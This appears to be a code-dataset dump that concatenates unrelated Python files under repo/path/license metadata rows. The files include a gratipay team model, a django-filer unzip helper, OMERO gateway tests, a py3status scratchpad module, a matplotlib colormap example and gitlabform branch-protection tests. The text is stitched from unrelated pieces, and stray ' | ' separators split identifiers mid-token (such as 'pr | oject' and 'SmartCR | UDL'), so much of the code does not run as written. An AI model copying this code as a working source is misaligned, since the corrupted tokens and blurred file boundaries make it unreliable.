# stylesheet.
self._qtWidget().setProperty( "gafferMenuIndicator", text != "" )
def __pressed( self ) :
if self.__menu is None :
return
b = self.bound()
self.__menu.popup(
parent = self,
position = imath.V2i( b.min().x, b.max().y ),
)
def __menuVisibilityChanged( self, menu ) :
if not menu.visible() :
self._qtWidget().setDown( False )
# There is a bug whereby Button never receives the event for __leave,
# if the menu is shown. This results in the image highlight state sticking.
if self.widgetAt( self.mousePosition() ) is not self :
self._Button__leave( self )
|
gratipay/gratipay.com | gratipay/models/package/team.py | Python | mit | 3,131 | 0.013095 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
import uuid
from gratipay.models.team import Team as _Team
class Team(object):
"""A :py:class:`~gratipay.models.package.Package` can have a
:py:class:`~gratipay.models.team.Team` associated with it.
"""
@property
def team(self):
"""A computed attribute, the :py:class:`~gratipay.models.team.Team`
linked to this package if there is one, otherwise ``None``. Makes a
database call.
"""
return self.load_team(self.db)
def load_team(self, cursor):
"""Given a database cursor, return a
:py:class:`~gratipay.models.team.Team` if there is one linked to this
package, or ``None`` if not.
"""
return cursor.one( 'SELECT t.*::teams FROM teams t WHERE t.id='
'(SELECT team_id FROM teams_to_packages tp WHERE tp.package_id=%s)'
, (self.id,)
)
def get_or_create_linked_team(self, cursor, owner):
"""Given a db cursor and a :py:class:`Participant`, return a
:py:class:`~gratipay.models.team.Team`.
"""
team = self.load_team(cursor)
if team:
return team
def slug_options():
# Having analyzed existing names, we should never get `@` without
# `/`. Be conservative in what we accept! Oh, wait ...
base_name = self.name.split('/')[1] if self.name.startswith('@') else self.name
yield base_name
for i in range(1, 10):
| yield '{}-{}'.format(base_name, i)
yield uuid.uuid4().hex
for slug in slug_options():
if cursor.one('SELECT count(*) FROM teams WHERE slug=%s', (slug,)) == 0:
break |
team = _Team.insert( slug=slug
, slug_lower=slug.lower()
, name=slug
, homepage='https://www.npmjs.com/package/' + self.name
, product_or_service=self.description
, owner=owner
, _cursor=cursor
)
cursor.run('INSERT INTO teams_to_packages (team_id, package_id) '
'VALUES (%s, %s)', (team.id, self.id))
self.app.add_event( cursor
, 'package'
, dict(id=self.id, action='link', values=dict(team_id=team.id))
)
return team
def unlink_team(self, cursor):
"""Given a db cursor, unlink the team associated with this package
(it's a bug if called with no team linked).
"""
team = self.load_team(cursor)
assert team is not None # sanity check
cursor.run('DELETE FROM teams_to_packages WHERE package_id=%s', (self.id,))
self.app.add_event( cursor
, 'package'
, dict(id=self.id, action='unlink', values=dict(team_id=team.id))
)
|
ojii/django-filer | filer/utils/zip.py | Python | mit | 916 | 0.00655 | import os
#import zipfile
# zipfile.open() is only available in Python 2.6, so we use the future version
from django.core.files.uploadedfile import SimpleUploadedFile
from filer.utils import zipfile
def unzip(file):
"""
Take a path to a zipfile and checks if it is a valid zip file
and returns...
"""
files = []
# TODO: implement try-except here
zip = zipfile.ZipFile(file)
bad_file = zip.testzip()
| if bad_file:
raise Exception('"%s" in the .zip archive is corrupt.' % bad_file)
| infolist = zip.infolist()
print infolist
for zipinfo in infolist:
print "handling %s" % zipinfo.filename
if zipinfo.filename.startswith('__'): # do not process meta files
continue
thefile = SimpleUploadedFile(name=zipinfo.filename, content=zip.read(zipinfo))
files.append( (thefile, zipinfo.filename) )
zip.close()
return files
|
savioabuga/phoenix | phoenix/health/views.py | Python | bsd-3-clause | 1,766 | 0.003964 | from django.core.urlresolvers import reverse
from smartmin.views import SmartCR | UDL, SmartCreateView, SmartReadView, SmartUpdateView, SmartListView
from .models import Treatment
from .forms import TreatmentForm
class TreatmentCRUDL(SmartCRUDL):
model = Treatment
actions = ('create', 'read', 'update', 'list')
class Create(SmartCreateView):
form_class = TreatmentForm
fields = ('date', 'description', 'animals', 'notes')
class Read(SmartReadView):
| fields = ('date', 'description', 'notes', 'animals')
def get_animals(self, obj):
animals = ''
for animal in obj.animals.all():
animals += '<a href=' + reverse('animals.animal_read', args=[animal.id]) + '>' + str(animal) + '</a>, '
return animals[:-2]
class Update(SmartUpdateView):
form_class = TreatmentForm
def customize_form_field(self, name, field):
field = super(TreatmentCRUDL.Update, self).customize_form_field(name, field)
if name == 'animals':
# Force the minimumInputLength to 0, so that it shows all the contacts by default
field.widget.options['minimumInputLength'] = 0
treatment = self.get_object()
animals = treatment.animals
field.widget.choices = [(animal.id, str(animal)) for animal in animals.order_by('name').all()]
field.initial = [animal.id for animal in animals.order_by('name').all()]
return field
class List(SmartListView):
fields = ('id', 'date', 'description', 'notes')
def get_queryset(self, **kwargs):
queryset = super(TreatmentCRUDL.List, self).get_queryset(**kwargs)
return queryset |
otsaloma/gaupol | gaupol/agents/format.py | Python | gpl-3.0 | 2,965 | 0 | # -*- coding: utf-8 -*-
# Copyright (C) 2005 Osmo Salomaa
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Formatting text."""
import aeidon
class FormatAgent(aeidon.Delegate):
"""Formatting text."""
@aeidon.deco.export
def _on_toggle_dialogue_dashes_activate(self, *args):
"""Add or remove dialogue dashes on the selected texts."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.toggle_dialogue_dashes(rows, doc)
@aeidon.deco.export
def _on_toggle_italicization_activate(self, *args):
"""Italicize or unitalicize the selected texts."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.toggle_italicization(rows, doc)
@aeidon.deco.export
def _on_use_lower_case_activate(self, *args):
"""Change the selected texts to lower case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.pr | oject.change_case(rows, doc, "lower")
@aeidon.deco.export
def _on_use_sentence_case_activate(self, *args):
"""Change the selected texts to sentence case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_col | umn_to_document(col)
page.project.change_case(rows, doc, "capitalize")
@aeidon.deco.export
def _on_use_title_case_activate(self, *args):
"""Change the selected texts to title case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.change_case(rows, doc, "title")
@aeidon.deco.export
def _on_use_upper_case_activate(self, *args):
"""Change the selected texts to upper case."""
page = self.get_current_page()
rows = page.view.get_selected_rows()
col = page.view.get_focus()[1]
doc = page.text_column_to_document(col)
page.project.change_case(rows, doc, "upper")
|
v00d00dem0n/PyCrashCourse | work/ch15/colormap_example.py | Python | gpl-3.0 | 3,677 | 0 | """
==================
Colormap reference
==================
Reference for colormaps included with Matplotlib.
This reference example shows all colormaps included with Matplotlib. Note that
any colormap listed here can be reversed by appending "_r" (e.g., "pink_r").
These colormaps are divided into the following categories:
Sequential:
These colormaps are approximately monochromatic colormaps varying smoothly
between two color tones---usually from low saturation (e.g. white) to high
saturation (e.g. a bright blue). Sequential colormaps are ideal for
representing most scientific data since they show a clear progression from
low-to-high values.
Diverging:
These colormaps have a median value (usually light in color) and vary
smoothly to two different color tones at high and low values. Diverging
colormaps are ideal when your data has a median value that is significant
(e.g. 0, such that positive and negative values are represented by
different colors of the colormap).
Qualitative:
These colormaps vary rapidly in color. Qualitative colormaps are useful for
choosing a set of discrete colors. For example::
color_list = plt.cm.Set3(np.linspace(0, 1, 12))
gives a list of RGB colors that are good for plotting a series of lines on
a dark background.
Miscellaneous:
Colormaps that don't fit into the categories above.
"""
import numpy as np
import matplotlib.pyplot as plt
# Have colormaps separated into categories:
# http://matplotlib.org/examples/color/colormaps_reference.html
cmaps = [('Perceptually Uniform Sequential', [
'viridis', 'plasma', 'inferno', 'magma']),
('Sequential', [
'Greys', 'Purples', 'Blues', 'Greens', 'Oranges', 'Reds',
'YlOrBr', 'YlOrRd', 'OrRd', 'PuRd', 'RdPu', 'BuPu',
'GnBu', 'PuBu', 'YlGnBu', 'PuBuGn', 'BuGn', 'YlGn']),
('Sequential (2)', [
'binary', 'gist_yarg', 'gist_gray', 'gray', 'bone', 'pink',
'spring', 'summer', 'autumn', 'winter', 'cool', 'Wistia',
'hot', 'afmhot', 'gist_heat', 'copper']),
('Diverging', [
'PiYG', 'PRGn', 'BrBG', 'PuOr', 'RdGy', 'RdBu',
'RdYlBu', 'RdYlGn', 'Spectral', 'coolwarm', 'bwr', 'seismic']),
('Qualitative', [
'Pastel1', 'Pastel2', 'Paired', 'Accent',
'Dark2', 'Set1', 'Set2', 'Set3',
'tab10', 'tab20', 'tab20b', 'tab20c']),
('Miscellaneous', [
'flag', 'prism', 'ocean', 'gist_earth', 'terrain', 'gist_stern',
'gnuplot', 'gnuplot2', 'CMRmap', 'cubehelix', 'brg', 'hsv',
'gist_rainbow', 'rainbow', 'jet', 'nipy_spectral', 'gist_ncar'])]
nrows = max(len(cmap_list) for cmap_category, cmap_list in cmaps)
gradient = np.linspace(0, 1, 256)
gradient = np.vstack((gradient, gradient))
def plot_color_gradients(cmap_category, cmap_list, nrows):
fig, axes = p | lt.subplots(nrows=nrows)
fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)
axes[0].set_title(cmap_category + ' colormaps', fontsize=14 | )
for ax, name in zip(axes, cmap_list):
ax.imshow(gradient, aspect='auto', cmap=plt.get_cmap(name))
pos = list(ax.get_position().bounds)
x_text = pos[0] - 0.01
y_text = pos[1] + pos[3]/2.
fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)
# Turn off *all* ticks & spines, not just the ones with colormaps.
for ax in axes:
ax.set_axis_off()
for cmap_category, cmap_list in cmaps:
plot_color_gradients(cmap_category, cmap_list, nrows)
plt.savefig(cmap_category+'.png', dpi=150)
plt.show()
|
tp81/openmicroscopy | components/tools/OmeroPy/test/integration/gatewaytest/test_connection.py | Python | gpl-2.0 | 8,597 | 0 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright 2009-2013 Glencoe Software, Inc. All rights reserved.
Use is subject to license terms supplied in LICENSE.txt
pytest fixtures used as defined in conftest.py:
- gatewaywrapper
- author_testimg
"""
import omero
import Ice
from omero.gateway.scripts import dbhelpers
import pytest
class TestConnectionMethods(object):
def testMultiProcessSession(self, gatewaywrapper):
# 120 amongst other things trying to getSession() twice for t | he same
# session dies. Also in separate processes.
# we mimic this by calling setGroupForSessio | n, which calls
# sessionservice.getSession, 2 times on cloned connections
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.gateway.getSession() is not None
c2 = gatewaywrapper.gateway.clone()
assert c2.connect(sUuid=gatewaywrapper.gateway._sessionUuid)
assert c2.getSession() is not None
a = c2.getAdminService()
g = omero.gateway.ExperimenterGroupWrapper(
c2, a.containedGroups(c2.getUserId())[-1])
c2.setGroupForSession(g)
c3 = gatewaywrapper.gateway.clone()
assert c3.connect(sUuid=gatewaywrapper.gateway._sessionUuid)
assert c3.getSession() is not None
a = c3.getAdminService()
g = omero.gateway.ExperimenterGroupWrapper(
c3, a.containedGroups(c3.getUserId())[1])
c3.setGroupForSession(g)
def testSeppuku(self, gatewaywrapper, author_testimg):
# author_testimg in args to make sure the image has been imported
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.getTestImage() is not None
gatewaywrapper.gateway.seppuku()
pytest.raises(Ice.ConnectionLostException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.getTestImage() is not None
gatewaywrapper.gateway.seppuku(softclose=False)
pytest.raises(Ice.ConnectionLostException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
# Also make sure softclose does the right thing
gatewaywrapper.loginAsAuthor()
g2 = gatewaywrapper.gateway.clone()
def g2_getTestImage():
return dbhelpers.getImage(g2, 'testimg1')
assert g2.connect(gatewaywrapper.gateway._sessionUuid)
assert gatewaywrapper.getTestImage() is not None
assert g2_getTestImage() is not None
g2.seppuku(softclose=True)
pytest.raises(Ice.ConnectionLostException, g2_getTestImage)
assert gatewaywrapper.getTestImage() is not None
g2 = gatewaywrapper.gateway.clone()
assert g2.connect(gatewaywrapper.gateway._sessionUuid)
assert gatewaywrapper.getTestImage() is not None
assert g2_getTestImage() is not None
g2.seppuku(softclose=False)
pytest.raises(Ice.ConnectionLostException, g2_getTestImage)
pytest.raises(Ice.ObjectNotExistException, gatewaywrapper.getTestImage)
gatewaywrapper._has_connected = False
gatewaywrapper.doDisconnect()
def testTopLevelObjects(self, gatewaywrapper, author_testimg):
##
# Test listProjects as root (sees, does not own)
parents = author_testimg.getAncestry()
project_id = parents[-1].getId()
# Original (4.1) test fails since 'admin' is logged into group 0, but
# the project created above is in new group.
# gatewaywrapper.loginAsAdmin()
# test passes if we remain logged in as Author
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
# test passes if we NOW log in as Admin (different group)
gatewaywrapper.loginAsAdmin()
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
##
# Test listProjects as author (sees, owns)
gatewaywrapper.loginAsAuthor()
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id in ids
##
# Test listProjects as guest (does not see, does not own)
gatewaywrapper.doLogin(gatewaywrapper.USER)
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
ids = map(lambda x: x.getId(), gatewaywrapper.gateway.listProjects())
assert project_id not in ids
##
# Test getProject
gatewaywrapper.loginAsAuthor()
assert gatewaywrapper.gateway.getObject(
"Project", project_id).getId() == project_id
##
# Test getDataset
dataset_id = parents[0].getId()
assert gatewaywrapper.gateway.getObject(
"Dataset", dataset_id).getId() == dataset_id
##
# Test listExperimenters
# exps = map(lambda x: x.omeName,
# gatewaywrapper.gateway.listExperimenters()) # removed from blitz
# gateway
exps = map(lambda x: x.omeName,
gatewaywrapper.gateway.getObjects("Experimenter"))
for omeName in (gatewaywrapper.USER.name, gatewaywrapper.AUTHOR.name,
gatewaywrapper.ADMIN.name.decode('utf-8')):
assert omeName in exps
assert len(list(gatewaywrapper.gateway.getObjects(
"Experimenter", attributes={'omeName': omeName}))) > 0
comboName = gatewaywrapper.USER.name + \
gatewaywrapper.AUTHOR.name + gatewaywrapper.ADMIN.name
assert len(list(gatewaywrapper.gateway.getObjects(
"Experimenter", attributes={'omeName': comboName}))) == 0
##
# Test lookupExperimenter
assert gatewaywrapper.gateway.getObject(
"Experimenter",
attributes={'omeName': gatewaywrapper.USER.name}).omeName == \
gatewaywrapper.USER.name
assert gatewaywrapper.gateway.getObject(
"Experimenter", attributes={'omeName': comboName}) is None
##
# still logged in as Author, test listImages(ns)
def listImages(ns=None):
imageAnnLinks = gatewaywrapper.gateway.getAnnotationLinks("Image",
ns=ns)
return [omero.gateway.ImageWrapper(gatewaywrapper.gateway,
link.parent) for link in imageAnnLinks]
ns = 'weblitz.test_annotation'
obj = gatewaywrapper.getTestImage()
# Make sure it doesn't yet exist
obj.removeAnnotations(ns)
assert obj.getAnnotation(ns) is None
# Check without the ann
assert len(listImages(ns=ns)) == 0
annclass = omero.gateway.CommentAnnotationWrapper
# createAndLink
annclass.createAndLink(target=obj, ns=ns, val='foo')
imgs = listImages(ns=ns)
assert len(imgs) == 1
assert imgs[0] == obj
# and clean up
obj.removeAnnotations(ns)
assert obj.getAnnotation(ns) is None
def testCloseSession(self, gatewaywrapper):
# 74 the failed connection for a user not in the system group does not
# get closed
gatewaywrapper.gateway.setIdentity(
gatewaywrapper.USER.name, gatewaywrapper.USER.passwd)
setprop = gatewaywrapper.gateway.c.ic.getProperties().setProperty
map(lambda x: setprop(x[0], str(x[1])),
gatewaywrapper.gateway._ic_props.items())
gatewaywrapper.gateway.c.ic.getImplicitContext().put(
omero.constants.GROUP, gatewaywrapper.gateway.group)
# I'm not certain the following assertion is as intended.
# This should be reviewed, see ticket #6037
# assert gatewaywrapper.gateway._sessionUuid == None
pytest.raises(omero.ClientError, gatewaywrapper.gateway._createSession)
assert gatewaywrapper.gateway._sessionUuid is not None
|
davzhang/helix-python-binding | org/apache/helix/store/zk/ZNode.py | Python | apache-2.0 | 3,019 | 0.007287 | # package org.apache.helix.store.zk
#from org.apache.helix.store.zk import *
#from java.util import Collections
#from java.util import HashSet
#from java.util import List
#from java.util import Set
#from org.apache.zookeeper.data import Stat
import copy
from kazoo.protocol.states import ZnodeStat
from org.apache.helix.util.ZKConstants import HelixZNodeStat
class ZNode:
"""
Java modifiers:
final static
Type:
Stat
"""
ZERO_STAT = HelixZNodeStat()
"""
Parameters:
String zkPath
Object data
Stat stat
"""
def __init__(self, zkPath, data, stat):
self._zkPath = zkPath
# self._childSet = Collections.emptySet()
self._childSet = set()
self._data = data
self._stat = stat
def removeChild(self, child):
"""
Returns void
Parameters:
child: String
"""
# if self._childSet != Collections.emptySet():
if self._childSet:
self._childSet.remove(child)
def addChild(self, child):
"""
Returns void
Parameters:
child: String
"""
if not self._childSet:
self._childSet = set()
self._childSet.add(child)
def addChildren(self, children):
"""
Returns void
Parameters:
children: List<String>
"""
# if children != None and not children.isEmpty():
if children:
if not self._childSet:
self._childSet = set()
self._childSet.update(children)
def hasChild(self, child):
"""
Returns boolean
Parameters:
child: String
"""
return self._childSet.__contains__(child)
def getChildSet(self):
"""
Returns Set<String>
"""
return self._childSet
def setData(self, data):
"""
Returns void
Parameters:
data: Object
"""
self._data = data
def getData(self):
"""
Returns Object
"""
return self._dat | a
def setStat(self, stat):
"""
Returns void
Parameters:
stat: Stat
"""
self._stat = stat
def getStat(self):
"""
Returns Stat
"""
return self._stat
def setChildSet(self, childNames):
"""
Returns void
Parameters:
childNames: | List<String>
"""
# if self._childSet == Collections.emptySet():
if childNames:
# if not self._childSet:
# self._childSet = set()
self._childSet = copy.copy(childNames)
# self._childSet.clear()
# self._childSet.addAll(childNames)
def toString(self):
"""
Returns String
@Override
"""
return self._zkPath + ", " + self._data + ", " + self._childSet + ", " + self._stat
|
Andrwe/py3status | py3status/modules/scratchpad.py | Python | bsd-3-clause | 5,375 | 0.001674 | # -*- coding: utf-8 -*-
"""
Display number of scratchpad windows and urgency hints.
Configuration parameters:
cache_timeout: refresh interval for i3-msg or swaymsg (default 5)
format: display format for this module
(default "\u232b [\?color=scratchpad {scratchpad}]")
thresholds: specify color thresholds to use
(default [(0, "darkgray"), (1, "violet")])
Format placeholders:
{scratchpad} number of scratchpads
{urgent} number of urgent scratchpads
Color thresholds:
xxx: print a color based on the value of `xxx` placeholder
Optional:
i3ipc: an improved python library to control i3wm and sway
Examples:
```
# hide zero scratchpad
scratchpad {
format = '[\?not_zero \u232b [\?color=scratchpad {scratchpad}]]'
}
# hide non-urgent scratchpad
scratchpad {
format = '[\?not_zero \u232b {urgent}]'
}
# bring up scratchpads on clicks
scratchpad {
on_click 1 = 'scratchpad show'
}
# add more colors
scratchpad {
thresholds = [
(0, "darkgray"), (1, "violet"), (2, "deepskyblue"), (3, "lime"),
(4, "yellow"), (5, "orange"), (6, "red"), (7, "tomato"),
]
}
```
@author shadowprince (counter), cornerman (async)
@license Eclipse Public License (counter), BSD (async)
SAMPLE OUTPUT
[{'full_text': '\u232b '}, {'full_text': u'0', 'color': '#a9a9a9'}]
violet
[{'full_text': '\u232b '}, {'full_text': u'5', 'color': '#ee82ee'}]
urgent
[{'full_text': '\u232b URGENT 1', 'urgent': True}]
"""
STRING_ERROR = "invalid ipc `{}`"
class Ipc:
"""
"""
def __init__(self, parent):
self.parent = parent
self.setup(parent)
class I3ipc(Ipc):
"""
i3ipc - an improved python library to control i3wm and sway
"""
def setup(self, parent):
from threading import Thread
self.parent.cache_timeout = self.parent.py3.CACHE_FOREVER
self.scratchpad_data = {"scratchpad": 0, "urgent": 0}
t = Thread(target=self.start)
t.daemon = True
t.start()
def start(self):
from i3ipc import Connection
i3 = Connection()
self.update(i3)
for event in ["window::move", "window::urgent"]:
i3.on(event, self.update)
i3.main()
def update(self, i3, event=None):
leaves = i3.get_tree().scratchpad().leaves()
temporary = {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum(window.urgent for window in leaves),
}
if self.scratchpad_data != temporary:
self.scratchpad_data = temporary
self.parent.py3.update()
def get_scratchpad_data(self):
return self.scratchpad_data
class Msg(Ipc):
"""
i3-msg - send messages to i3 window manager
swaymsg - send messages to sway window manager
"""
def setup(self, parent):
from json import loads
self.json_loads = loads
wm_msg = {"i3msg": "i3-msg"}.get(parent.ipc, parent.ipc)
self.tree_command = [wm_msg, "-t", "get_tree"]
def get_scratchp | ad_data(self):
tree = self.json_loads(self.parent.py3.command_output(self.tree_command))
leaves = self.find_scratchpad(tree).get("floating_nodes", [])
return {
"ipc": self.parent.ipc,
"scratchpad": len(leaves),
"urgent": sum([window["urgent"] for window in leaves]),
| }
def find_scratchpad(self, tree):
if tree.get("name") == "__i3_scratch":
return tree
for x in tree.get("nodes", []):
result = self.find_scratchpad(x)
if result:
return result
return {}
class Py3status:
"""
"""
# available configuration parameters
cache_timeout = 5
format = "\u232b [\?color=scratchpad {scratchpad}]"
thresholds = [(0, "darkgray"), (1, "violet")]
def post_config_hook(self):
# ipc: specify i3ipc, i3-msg, or swaymsg, otherwise auto
self.ipc = getattr(self, "ipc", "")
if self.ipc in ["", "i3ipc"]:
try:
from i3ipc import Connection # noqa f401
self.ipc = "i3ipc"
except Exception:
if self.ipc:
raise # module not found
self.ipc = (self.ipc or self.py3.get_wm_msg()).replace("-", "")
if self.ipc in ["i3ipc"]:
self.backend = I3ipc(self)
elif self.ipc in ["i3msg", "swaymsg"]:
self.backend = Msg(self)
else:
raise Exception(STRING_ERROR.format(self.ipc))
self.thresholds_init = self.py3.get_color_names_list(self.format)
def scratchpad(self):
scratchpad_data = self.backend.get_scratchpad_data()
for x in self.thresholds_init:
if x in scratchpad_data:
self.py3.threshold_get_color(scratchpad_data[x], x)
response = {
"cached_until": self.py3.time_in(self.cache_timeout),
"full_text": self.py3.safe_format(self.format, scratchpad_data),
}
if scratchpad_data["urgent"]:
response["urgent"] = True
return response
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
config = {"format": "\[{ipc}\] [\?color=scratchpad {scratchpad}]"}
module_test(Py3status, config=config)
|
CIGIHub/greyjay | greyjay/articles/migrations/0024_auto_20150722_1928.py | Python | mit | 369 | 0 | # -*- codi | ng: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0023_auto_20150716_2129'),
]
operations = [
migrations.AlterModelOptions(
| name='topic',
options={'ordering': ['name']},
),
]
|
agilman/django_maps2 | maps/signals.py | Python | mit | 601 | 0.018303 |
#print("OK, imported signal handling")
from registration.signals import user_registered
import os
from django_maps2 import settings
#This callback is listening for user to register. Creates directories for user images.
def postRegistration(sender,user,request, **kwargs):
m | edia_root = settings.USER_MEDIA_ROOT
if not os.path.exists(media_root +"/"+ str(user.pk)):
os.mkdir(media_root + "/" + str(user.pk))
os.mkdir(media_root + "/" + str(user.pk)+"/profile_pictures")
#print("hello, got user registration signal")
user_registered.connect(postRegist | ration)
|
rwgdrummer/maskgen | plugins/OutputPDF/__init__.py | Python | bsd-3-clause | 1,012 | 0.021739 | from PIL import Image
from maskgen import exif
import numpy as np
import PIL
"""
Save the image as PDF. If the image has a orientation and 'Image Rotated', rotate the image according to the EXIF.
"""
def transform(img,source,target, **kwargs):
if 'resolution' in kwargs:
res = float(int(kwargs['resolution']))
else:
res = 200.0
im = img.convert('RGB').to_array()
Image.fromarray(im).save(target,format='PDF',resolution=res)
return None,None
def operation():
return {'name':'OutputPDF',
'category':'Output',
'description':'Save an image as .pdf',
'software':'PIL',
| 'version':PIL.__version__,
'arguments':{
'resolution':{
| 'type':'int',
'defaultvalue':'100',
'description':'DPI'
}
},
'transitions': [
'image.image'
]
}
def suffix():
return '.pdf'
|
egnyte/gitlabform | tests/acceptance/test_branches.py | Python | mit | 32,440 | 0.001326 | import pytest
from gitlabform.gitlab import AccessLevel
from tests.acceptance import (
run_gitlabform,
DEFAULT_README,
get_gitlab,
)
gl = get_gitlab()
@pytest.fixture(scope="function")
def branches(request, gitlab, group_and_project):
branches = [
"protect_branch_but_allow_all",
"protect_branch_with_code_owner_approval_required",
"protect_branch_and_disallow_all",
"protect_branch_and_allow_merges",
"protect_branch_and_allow_pushes",
"protect_branch_and_allow_merges_access_levels",
"protect_branch_and_allow_pushes_access_levels",
"protect_branch_and_allowed_to_push",
"protect_branch_and_allowe | d_to_merge",
"protect_branch_and_allow_access_l | evels_with_user_ids",
"protect_branch",
]
for branch in branches:
gitlab.create_branch(group_and_project, branch, "main")
def fin():
for branch in branches:
gitlab.delete_branch(group_and_project, branch)
gitlab.set_file(
group_and_project,
"main",
"README.md",
DEFAULT_README,
"Reset default content",
)
request.addfinalizer(fin)
@pytest.fixture(scope="function")
def one_maintainer_and_two_developers(gitlab, group_and_project, users):
gitlab.add_member_to_project(
group_and_project, users[0], AccessLevel.MAINTAINER.value
)
gitlab.add_member_to_project(
group_and_project, users[1], AccessLevel.DEVELOPER.value
)
gitlab.add_member_to_project(
group_and_project, users[2], AccessLevel.DEVELOPER.value
)
yield group_and_project
# we try to remove all users, not just the 3 added above,
# on purpose, as more may have been added in the tests
for user in users:
gitlab.remove_member_from_project(group_and_project, user)
class TestBranches:
    def test__protect_branch_but_allow_all(self, gitlab, group_and_project, branches):
        """Protect a branch while still allowing developer pushes and merges."""
        protect_branch_but_allow_all = f"""
        projects_and_groups:
          {group_and_project}:
            branches:
              protect_branch_but_allow_all:
                protected: true
                developers_can_push: true
                developers_can_merge: true
        """
        run_gitlabform(protect_branch_but_allow_all, group_and_project)
        branch = gitlab.get_branch(group_and_project, "protect_branch_but_allow_all")
        assert branch["protected"] is True
        assert branch["developers_can_push"] is True
        assert branch["developers_can_merge"] is True
# @pytest.mark.skipif(
# gl.has_no_license(), reason="this test requires a GitLab license (Paid/Trial)"
# )
# def test__code_owners_approval(self, gitlab, group_and_project, branches):
# group_and_project = group_and_project
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, "protect_branch_but_allow_all"
# )
# assert branch_access_levels["code_owner_approval_required"] is False
#
# protect_branch_with_code_owner_approval_required = f"""
# projects_and_groups:
# {group_and_project}:
# branches:
# protect_branch_with_code_owner_approval_required:
# protected: true
# developers_can_push: false
# developers_can_merge: true
# code_owner_approval_required: true
# """
#
# run_gitlabform(
# protect_branch_with_code_owner_approval_required, group_and_project
# )
#
# branch_access_levels = gitlab.get_branch_access_levels(
# group_and_project, "protect_branch_with_code_owner_approval_required"
# )
# assert branch_access_levels["code_owner_approval_required"] is True
    def test__protect_branch_and_disallow_all(
        self, gitlab, group_and_project, branches
    ):
        """Protect a branch and forbid developer pushes and merges."""
        protect_branch_and_disallow_all = f"""
        projects_and_groups:
          {group_and_project}:
            branches:
              protect_branch_and_disallow_all:
                protected: true
                developers_can_push: false
                developers_can_merge: false
        """
        run_gitlabform(protect_branch_and_disallow_all, group_and_project)
        branch = gitlab.get_branch(group_and_project, "protect_branch_and_disallow_all")
        assert branch["protected"] is True
        assert branch["developers_can_push"] is False
        assert branch["developers_can_merge"] is False
    def test__mixed_config(self, gitlab, group_and_project, branches):
        """Protect two branches with opposite settings, then unprotect both."""
        mixed_config = f"""
        projects_and_groups:
          {group_and_project}:
            branches:
              protect_branch_and_allow_merges:
                protected: true
                developers_can_push: false
                developers_can_merge: true
              protect_branch_and_allow_pushes:
                protected: true
                developers_can_push: true
                developers_can_merge: false
        """
        run_gitlabform(mixed_config, group_and_project)
        # First branch: merges allowed, pushes forbidden.
        branch = gitlab.get_branch(group_and_project, "protect_branch_and_allow_merges")
        assert branch["protected"] is True
        assert branch["developers_can_push"] is False
        assert branch["developers_can_merge"] is True
        # Second branch: pushes allowed, merges forbidden.
        branch = gitlab.get_branch(group_and_project, "protect_branch_and_allow_pushes")
        assert branch["protected"] is True
        assert branch["developers_can_push"] is True
        assert branch["developers_can_merge"] is False
        unprotect_branches = f"""
        projects_and_groups:
          {group_and_project}:
            branches:
              protect_branch_and_allow_merges:
                protected: false
              protect_branch_and_allow_pushes:
                protected: false
        """
        run_gitlabform(unprotect_branches, group_and_project)
        for branch in [
            "protect_branch_and_allow_merges",
            "protect_branch_and_allow_pushes",
        ]:
            branch = gitlab.get_branch(group_and_project, branch)
            assert branch["protected"] is False
def test__mixed_config_with_new_api(
self,
gitlab,
group_and_project,
branches,
users,
one_maintainer_and_two_developers,
):
mixed_config_with_access_levels = f"""
projects_and_groups:
{group_and_project}:
branches:
protect_branch_and_allow_merges_access_levels:
protected: true
push_access_level: {AccessLevel.NO_ACCESS.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
'*_allow_pushes_access_levels':
protected: true
push_access_level: {AccessLevel.DEVELOPER.value}
merge_access_level: {AccessLevel.DEVELOPER.value}
unprotect_access_level: {AccessLevel.MAINTAINER.value}
"""
run_gitlabform(mixed_config_with_access_levels, group_and_project)
(
push_access_levels,
merge_access_levels,
push_access_user_ids,
merge_access_user_ids,
unprotect_access_level,
) = gitlab.get_only_branch_access_levels(
group_and_project, "protect_branch_and_allow_merges_access_levels"
)
